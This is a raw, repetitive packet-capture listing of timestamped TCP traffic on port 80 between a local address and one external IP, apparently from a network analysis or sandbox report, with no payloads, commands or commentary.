                                                                            Jan 2, 2025 20:34:56.965847969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.965867043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.965878010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.965888023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.965905905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.965915918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.965926886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.965935946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.967426062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.970639944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.970650911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.970668077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.970679045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.970695972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.970706940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.970716953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.970720053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.970727921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.970763922 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.975183010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.975194931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.975203991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.975214005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.975224018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.975234032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.975235939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.975244045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.975254059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.975292921 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.980452061 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.980463028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.980473995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.980483055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.980493069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.980503082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.980504036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.980514050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.980523109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.980539083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.980559111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.986010075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.986020088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.986033916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.986049891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.986051083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.986061096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.986080885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.986109018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.986129045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.986140013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.986152887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.986166000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.986193895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.988116026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.988126040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.988136053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.988147020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.988158941 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.988162994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.988176107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.988183975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.988189936 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.988220930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.988230944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.988235950 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.988240004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.988254070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.988280058 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.004450083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.004462957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.004508018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.004528046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.004569054 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.004601955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.004612923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.004623890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.004633904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.004640102 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.004645109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.004661083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.004693985 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.009326935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.009346962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.009366989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.009382963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.009393930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.009394884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.009404898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.009417057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.009424925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.009428024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.009439945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.009469032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.015939951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.015950918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.015968084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.015978098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.015989065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.016000032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.016005039 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.016011000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.016038895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.016055107 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.020891905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.020903111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.020914078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.020924091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.020935059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.020945072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.020947933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.020956039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.020989895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.024615049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.024625063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.024663925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.024708986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.024719954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.024738073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.024746895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.024748087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.024759054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.024770021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.024775982 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.024804115 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.043198109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043220043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043231964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043258905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.043267965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043279886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043289900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.043292046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043303013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043323040 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.043323040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043334961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043337107 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.043344975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043355942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043356895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.043365955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043371916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043397903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.043412924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043422937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043426037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.043432951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043442965 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.043445110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043454885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043464899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043478012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.043484926 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.043512106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.044270039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.044286966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.044302940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.044312954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.044315100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.044323921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.044325113 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.044333935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.044343948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.044353962 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.044383049 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.049563885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.049583912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.049593925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.049607992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.049633980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.049635887 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.049650908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.049663067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.049673080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.049688101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.049690962 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.049716949 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.049736977 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.052537918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.052575111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.052583933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.052603960 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.052624941 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.052670956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.052683115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.052707911 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.052711964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.052722931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.052733898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.052742958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.052755117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.052773952 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.057425976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.057435989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.057470083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.057492971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.057504892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.057517052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.057527065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.057537079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.057542086 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.057548046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.057579041 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.057590008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.061836004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.061894894 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.061944962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.061954975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.061964989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.061975002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.061985016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.061989069 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.061996937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.062005997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.062007904 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.062026024 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.062063932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.067293882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.067331076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.067337990 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.067342997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.067370892 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.067383051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.067393064 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.067394018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.067404985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.067425966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.067459106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.067506075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.067517042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.067548990 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.072809935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.072864056 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.072933912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.072978973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.073005915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.073021889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.073034048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.073044062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.073044062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.073055029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.073060036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.073065042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.073085070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.073117018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.074882984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.074893951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.074938059 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.075026989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.075043917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.075054884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.075064898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.075076103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.075086117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.075094938 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.075119972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.075136900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.093877077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.093903065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.093914986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.093924999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.093935966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.093946934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.093955994 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.093961954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.093990088 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.094022036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.100716114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.100727081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.100773096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.100800037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.100802898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.100812912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.100825071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.100835085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.100846052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.100857019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.100873947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.100895882 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.104274035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.104285002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.104324102 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.104357958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.104374886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.104388952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.104394913 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.104398966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.104409933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.104419947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.104420900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.104453087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.108114958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.108160019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.108181000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.108182907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.108211040 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.108226061 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.108300924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.108311892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.108323097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.108334064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.108338118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.108346939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.108356953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.108356953 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.108392000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.111536026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.111548901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.111562014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.111571074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.111582041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.111593008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.111597061 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.111617088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.111629963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.111646891 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.111675024 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.129889011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.129937887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.129939079 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.129956007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.129973888 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.129976034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.129988909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.129990101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.130001068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.130011082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.130013943 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.130023956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.130028009 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.130053997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.130065918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.130075932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.130088091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.130104065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.130115986 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.130140066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.130208969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.130220890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.130232096 CET804973047.254.187.72192.168.2.4
